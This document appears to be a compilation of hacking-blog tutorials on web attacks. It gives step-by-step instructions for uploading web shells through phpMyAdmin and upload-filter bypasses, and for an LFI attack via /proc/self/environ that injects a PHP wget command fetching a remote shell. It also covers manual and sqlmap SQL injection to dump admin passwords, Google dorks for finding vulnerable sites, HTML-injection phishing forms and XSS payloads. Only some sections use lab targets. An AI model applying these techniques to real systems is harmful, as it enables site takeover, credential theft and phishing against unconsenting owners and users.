Shell Uploading Via Phpmyadmin

Shell Uploading Via Phpmyadmin

In this tutorial I will show you Shell Uploading Via Phpmyadmin step by step. For those who know this trick i am sorry for that but there are my many friends who don’t know this trick.

Phpmyadmin should be protected with passwords but still there are some website which doesn’t use password in phpmyadmin.

  • First we must know the path of document root like phpinfo.php .
  • Now we will go to phpmyadmin and will create a database.

I have created a database name shell. just create a database with your desired name.

  • After creating a database just click on database and then go to structure and and create a table with 1 column and after clicking on go enter name select type to text.

shell uploading via phpmyadmin

  • Then go to insert and paste your uploader code and click on go.

shell uploading via phpmyadmin

  • Now go to table in database and go to SQL tab and Insert this query.

 shell uploading via phpmyadmin

SELECT * FROM shell INTO OUTFILE 'C://wamp//www//shell//shell.php
  • Yeah we have uploaded our uploader from phpmyadmin now just go to the desired location and upload your shell. 😉

Shell Uploading Via Tamper Data

Shell Uploading Via Tamper Data

In this session we will discuss about shell uploading via tamper Data or shell uploading bypass method. During hacking you got successfully login to admin panel where they ask you for uploading image in .jpg and .png extension but you are not able to upload shell then read this tutorial carefully step by step.

In this tutorial we will bypass from unrestricted files upload using jpg extension so lets start our work.

  • Go to your desired location to upload files and rename your shell with .php.jpg extension like shell.php to shell.php.jpg as shown below.

Shell Uploading Via Tamper Data

  • Now just click on tools>Tamper Data>start tamper and click on upload.
  • Now tamper your page and in Post data find your file and rename shell.php.jpg to shell.php and then click ok.

Shell Uploading Via Tamper Data

  • Now your shell is successfully uploaded just access your shell.

Shell Uploading Via Tamper Data

Advance Shell uploading bypassing Extensions

1)shell.jpg.php (satisfies as check for jpg only)
2)shell.jpg.PhP (obfuscation)

3)shell.php;.jpg (sometimes can ignore whats after “;”)

4)shell.php%0delete0.jpg (the infamous NULL byte which comments out trailing text, remove the word delete so the zeros join together, blogspot strips this string!)

5)shell.php.test (defaults to first recognised extension ignoring “test”)

6)shell.php.xxxjpg (still ends in .jpg, but not recognised extension so will default to php!)

7).phtml (a commonly used php parsed extension often forgotten about!)

8).php3/.php4/.php5 (valid PHP extensions possibly left out of extension blacklists)

Local File Inclusion (LFI) Vulnerability Attack

Local File Inclusion (LFI) Vulnerability Attack

In this tutorial we will discuss about the local file inclusion vulnerability and how it occurs and can be patched so first let me start with introduction about file inclusion.

A file inclusion is a vulnerability which allows an attacker to access unauthorised file on web server and can execute the malicious code by using ‘include’ functional vulnerability.

What is Local File Inclusion (LFI) vulnerability ?

The local file inclusion LFI is a process of Including Local File available on webserver. This vulnerability occur when a user input contains the path of the file that has been included. When this input is not properly sanitised then an attacker give the some default files location and access all these sensitives files.

Finding Local file Inclusion (LFI)vulnerability in website

Now we are going to find an local file inclusion on website so we found a website lets check it if its vulnerable or not.

 www.vulnerablewebsite.com/view.php?page=contact.php

Now lets replace contact.php with ../ so the URL will become

www.vulnerablewebsite.com/view.php?page=../|

Now after requesting this page we got an error here big chances to have a Local File Inclusion vulnerability.Let’s go to next step.

Warning: include(../) [function.include]: failed to open stream: No
such file or directory in /home/sirgod/public_html/website.com/view.php on
line 1337

Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request.

www.vulnerablewebsite.com/view.php?page=../../../etc/passwd

we got error and no etc/passwd file

Warning: include(../) [function.include]: failed to open stream: No
such file or directory in /home/sirgod/public_html/website.com/view.php on
line 1337

so we go more directories up..

www.vulnerablewebsite.com/view.php?page=../../../../../etc/passwd

If you will get a page like this that means you have successfully Included a /etc/passwd file.

 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

yeah we successfully included a file and our next step is to include a proc/self/environ file. so now replace /etc/passwd with /proc/self/environ file as shown below.

 www.vulnerablewebsite.com/view.php?page=../../../../../proc/self/environ

If you get something like this that means you have successfully included a proc/self/environ file.

 DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml,
image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.vulnerablewebsite.com
HTTP_REFERER=http://www.vulnerablewebsite.com/index.php?view=../../../../../../etc/pass wd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15
Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenvir
on SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com
SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2
mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at
www.vulnerablewebsite.com Port 80

proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.

Injecting a Malicious code in Local File Inclusion vulnerable website

Now let’s inject our malicious code in proc/self/environ.How we can do that? We can inject our code in User-Agent HTTP Header. Use Tamper Data Addon for Firefox to change the User-Agent. Start Tamper Data in Firefox and re-request the URL

 www.vulnerablewebsite.com/view.php?page=../../../../../proc/self/environ

Now Tamper this page and in user agent add you uploader script and then submit. after submitting you will get an uploader or /proc/self/environ page just browse and upload your shell.

You can also upload your shell by downloading remotely using wget command.

 <?system('wget www.shell.com/shell.txt -O shell.php');?>

Add this command in user agent and request the page. Now our command is successfully executed and will download the .txt shell from www.shell.com/shell.txt and save it as shell.php  in the website directory) through system(), and our shell will be created.If don’t
work,try exec() because system() can be disabled on the webserver from php.ini.

Accessing our shell

Now lets check if our malicous code was successfully injected. Lets check if the shell is present.

www.vulnerablewebsite.com/shell.php

Our shell is there. Injection was succesfully.

So I think every body enjoyed this tutorial keep practising and learning. 🙂

SQL injection Union Based Manually Step by Step

SQL injection Union Based Manually Step by Step

Hello guys hope you were doing good in this tutorial we will discuss about basic SQL injection union based manually so first i would like to recommended you to learn the basic of SQL from w3schools. so lets me start from introduction.

What is SQL Injection ?

SQL Injection is a type of code injection vulnerability in database layer. A successfull sql injection exploit can read and modify the backend database. This vulnerability can be found when user input is incorrectly filtered for string.

What an attacker can do ?

  • An attacker can Inject in website and can read and modify database.
  • An attacker can take the control of your admin panel if you have.
  • If the targeted website is E-commerce and website store the information then attacker can easily get.
  • An attacker can shell and deface the website.

So lets start our work….

Step 1:

Find an SQL Injection vulnerable website with google dorks. Huge list of SQLI dorks click Here

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:shop.php?id=

Step 2:

Now you will have to check the vulnerability by adding single quote after id parameter and hit enter if you will get a error message like sql syntax error that means site is vulnerable to sql attack.

www.vulnerablesite.com/index.php?id=1'

Step 3:

Now after checking the vulnerability if the site is vulnerable then you will have to find the number of columns by using order by statement.

www.vulnerablesite.com/index.php?id=1' order by 1 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 2 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 3 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 4 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 5 --+ [error]

Here i got the error message in order by 5 that means the total number columns are 5.

Step:4

Now we will the vulnerable column using union command

www.vulnerablesite.com/index.php?id=1' union select 1,2,3,4 -- +

SQL injection manually

As you can see in the above image vulnerable column is 2 following things we will use this commands.

Version - @@version also version()
Database- database()
Current User - user()

Step 5 :

Now we will find the table name just paste this query in vulnerable column given below.

(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE())

SQL injection Union Based ManuallyStep 6:

we will find the column names of particular table just use this query.

www.vulnerablesite.com/index.php?id=1' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name= [table name in hex]

yeah now we got column name of table name and our next target is to dump data.

Step 7:

Now we got database,table name and column name as well so we will dump database of the targeted website. just replace column_name with the target column for example. admin, user e.t.c and add in last from targeted table.

www.vulnerablesite.com/index.php?id=1' union select 1,group_concat(username,0x3a,password),3,4 from admin--+

yeah we got the username and password.

keep practising but don’t harm any site…

 

HTML Injection Step by Step For Begineers

HTML Injection Step by Step For Begineers

Hello guys, hope you were doing good and practising so today in this post we will discuss about HTML injection and why HTML injection is risky.

What is HTML injection ?
HTML Injection, Hyper Text Markup Language Injection is a vulnerability which allows an attacker to inject a malicious script via specific parameter. Also HTML Injection is referred as a virtual defacement of web application.

The possible attveack scenario are demonstrated below

  1. An attacker can find a vulnerability and perform HTML injection vulnerability.
  2. An attacker can do phishing from the vulnerable website and send email to victim.
  3. The user visits the page due to the trust worthy domain and can Enter User Id and password which is sent to attacker server.

So lets start ..

  1. Firstly you need to find a website which is vulnerable to HTML Injection. Here I am using bWAPP lab.
  2. Here I have opened the page which is vulnerable to HTML injection. Just add your HTML code as shown below.

Html injection

3. As you can see I add my simple <h1> ahmed </h1> code and executed. this code is executed.

4. Now lets try with some html More html tag such as bold, colour, background e.t.c.

Html injection

See the above image i have modified its look using some basic tags. You can also perform XSS attack using HTML Injection as shown in below image.

Html injection

So let’s try to create a login form using this code.

<form action=”http://127.0.0.1/login.php” method=”POST”>
Username: <input type=”text” name=”username”><br>
Password: <input type=”password” name=”pass”><br>
<input type=”submit” value=”Login”></form>

Make your any page or you can add you deface page change this code and and change you location.

<form action=”http://127.0.0.1/login.php” method=”POST”>

 

Html injection

Just login with any username and password and see what happens.

Html injection

This page is shown after login of victim 🙁 and we got successfully ID and Password.

Keep Learning.. and Injecting but don’t harm an site.

How to find sql vulnerable website easily

How to find sql vulnerable website easily

Hello guys in this post I will show you how you can find a lots sql vulnerable website in by single dork using automated tool but I recommended you to find manually. Many of the newbie don’t get vulnerable site easily to inject so in this tutorial they can be able to  find  sql vulnerable website easily.

So in this tutorial we will use SQL DB if you don’t have SQL DB then you can download it from google.

  • Launch SQL DB and in the left position you will see search option.

sql vulnerable site

  • just enter your dork. here the best feature of this tool is it has the option of search engine by which search engine you wanna use and the another one is Deep scan and proxy.
  • when you start search using your dork then it will start scanning.
  • now scanning started here you can see many of the multiple tab such as proxy, vulnerable e.t.c
  • just click on that vulnerable and it show you the list of sql vulnerable website

Cross site scripting (XSS) Vulnerability

Cross site scripting (XSS) Vulnerability

Hello Guys , Welcome to Infosec Zone today I gonna show you Cross site scripting vulnerability which is one of the most dangerous vulnerability and listed in owasp top 10 read carefully try and practice. In this tutorial we will cover Reflected Cross site scripting in GET Method and Post Method.

What is cross site scripting ( XSS )

XSS is a Type of attack in which an attacker inject a malicious script in website. XSS occur when use web application in the form of browser side script to different end users.

Malicious script can access any cookies, session, tokens or other sensitive information e.t.c. It is caused by insufficient input validations in server side as well as client side.

There are basic two types of XSS

  • Reflected cross site scripting XSS Attack (Non-Persistent)
  • Stored cross site scripting XSS Attack (Persistent)

Read their more information in OWASP official website

So lets start Practical…

Here I am using bWAPP on my localhost you can use this or DVWA. But I thinks that bWAPP is quite much better than DVWA.

So in this practical we use this payload

<img src=lol.png onerror=prompt(document.domain) />

first select xss vulnerability to attack and start.

XSS

<img src=lol.png onerror=prompt(document.domain) />

Just paste this payload in first name and last name and click go as a result you can see that our code is executed and got a popup.cross site scripting Xss

great we had successfully XSSED…. 🙂

The above XSS was GET method. Lets start Post Method for Post Method the requirement is hackbar Addon in firefox. install it if you don’t have and follow me step by step.

just click on post data in hackbar and type any thing in both field and load URL you will see some thing like this.

xss attack

in post data add the payload. see in below image and execute

xss post 2

yeah our code is executed…Keep learning.. 🙂 and share it

 

 

 

 

 

 

SQL injection through SQLMAP step by step

SQL Injection through SQLMAP

Hello Guy, Today I gonna show you a major vulnerability in web applications. There are many types of injection and in this a SQL Injection Comes also. SQL Injection is very vast keep learning even though I am also still learner so without wasting any time lets come to point.

SQL Injection

SQL Injection is a type of vulnerability in which an attacker can execute can some code and expose backend database or in simple words an attacker can dump your database.

SQL Map

SQL map is a command line interface tool use for exploiting SQL injection vulnerabilities it is a open source tool .

If you are using windows you can download SQL Map Here , However Kali has inbuilt SQLMAP

Lets start practicle…….

  • Launch SQLMAP

Now type Following command in terminal

  • python sqlmap.py -u http://yourtargetaddress.com/?id=1 –current-db

Sql injections attack

  • Now our SQL map started. It will take some couple of seconds to enumerate database
  • now we got the database as you can see the above image. our next step is to enumerate tables
  • Type the following command to enumerate tables follow me step by step. 🙂

python sqlmap.py -u http://yourtargetaddress.com/?id=1 -D database name –table

sql injection by sqlmap

as you can see in the below image we had successfully enumerate table names.

sql injections vulnerability

In the above Image you can see that sqlmap enumerated table name no we will have to find column. here i am finding columns fo admin.

python sqlmap.py -u http://yourtargetaddress.com/?id=1 -D database name -T table name –columns

again sqlmap is enumerating column name from the table admin.

Sql injections tutorial

Cool guys we had successfully enumerate the column name now our next step is to dump/enumerate the Username and password.

Follow me and use this command

python sqlmap.py -u http://yourtargetaddress.com/?id=1 -D database name -T table name -C column name –dump

sql injections

sql map started a enumerating database as you can see database enumerated.

Sql Injection

yeah, we got username and password.. 🙂 keep learning and practising but don’t harm any site…